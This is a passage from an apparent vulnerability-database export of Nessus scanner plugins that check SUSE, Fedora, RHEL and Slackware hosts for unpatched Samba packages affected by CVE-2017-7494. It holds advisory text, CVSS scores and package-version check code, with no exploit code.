rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", 
reference:\"libnetapi0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libregistry0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libregistry0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", 
reference:\"libsmbclient-raw0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbldap0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-32bit-4.2.4-33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.2.4-33.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-4.2.4-33.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-devel / ctdb-tests / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:11:26", "description": "Security fix for CVE-2017-7494\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-30T00:00:00", "title": "Fedora 25 : 2:samba (2017-642a0eca75) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-30T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2017-642A0ECA75.NASL", "href": "https://www.tenable.com/plugins/nessus/100490", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-642a0eca75.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100490);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"FEDORA\", value:\"2017-642a0eca75\");\n\n script_name(english:\"Fedora 25 : 2:samba (2017-642a0eca75) (SambaCry)\");\n script_summary(english:\"Checks rpm output for the 
updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2017-7494\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-642a0eca75\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/05/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"samba-4.5.10-0.fc25\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T05:39:25", "description": "An update for samba3x is now available for Red Hat Enterprise Linux 5\nExtended Lifecycle Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. 
Upstream acknowledges steelo as the original reporter.", "edition": 39, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "title": "RHEL 5 : samba3x (RHSA-2017:1272) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:samba3x-winbind", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui", "p-cpe:/a:redhat:enterprise_linux:samba3x-common", "p-cpe:/a:redhat:enterprise_linux:samba3x-doc", "p-cpe:/a:redhat:enterprise_linux:samba3x-swat", "p-cpe:/a:redhat:enterprise_linux:samba3x-client", "p-cpe:/a:redhat:enterprise_linux:samba3x-debuginfo", "p-cpe:/a:redhat:enterprise_linux:samba3x", "p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel"], "id": "REDHAT-RHSA-2017-1272.NASL", "href": "https://www.tenable.com/plugins/nessus/100452", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1272. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100452);\n script_version(\"3.17\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"RHSA\", value:\"2017:1272\");\n\n script_name(english:\"RHEL 5 : samba3x (RHSA-2017:1272) (SambaCry)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for samba3x is now available for Red Hat Enterprise Linux 5\nExtended Lifecycle Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es) :\n\n* A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share,\ncould use this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges steelo as the original reporter.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/security/CVE-2017-7494.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/3034621\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-7494\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1272\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-3.6.23-14.el5_11\")) flag++;\n 
if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-client-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-client-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-client-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-common-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-common-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-common-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-debuginfo-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-doc-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-doc-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-doc-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-domainjoin-gui-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"samba3x-swat-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"samba3x-swat-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"samba3x-swat-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-3.6.23-14.el5_11\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"samba3x-winbind-devel-3.6.23-14.el5_11\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + 
redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:11:01", "description": "New samba packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.", "edition": 33, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-25T00:00:00", "title": "Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : samba (SSA:2017-144-01) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-25T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux", "p-cpe:/a:slackware:slackware_linux:samba", "cpe:/o:slackware:slackware_linux:13.1"], "id": "SLACKWARE_SSA_2017-144-01.NASL", "href": "https://www.tenable.com/plugins/nessus/100389", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-144-01. 
The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100389);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-7494\");\n script_xref(name:\"SSA\", value:\"2017-144-01\");\n\n script_name(english:\"Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : samba (SSA:2017-144-01) (SambaCry)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New samba packages are available for Slackware 13.1, 13.37, 14.0,\n14.1, 14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.513769\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b360dd59\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.1\", pkgname:\"samba\", pkgver:\"3.5.22\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"3.5.22\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"samba\", pkgver:\"3.5.22\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"3.5.22\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"samba\", pkgver:\"4.4.14\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"samba\", pkgver:\"4.4.14\", 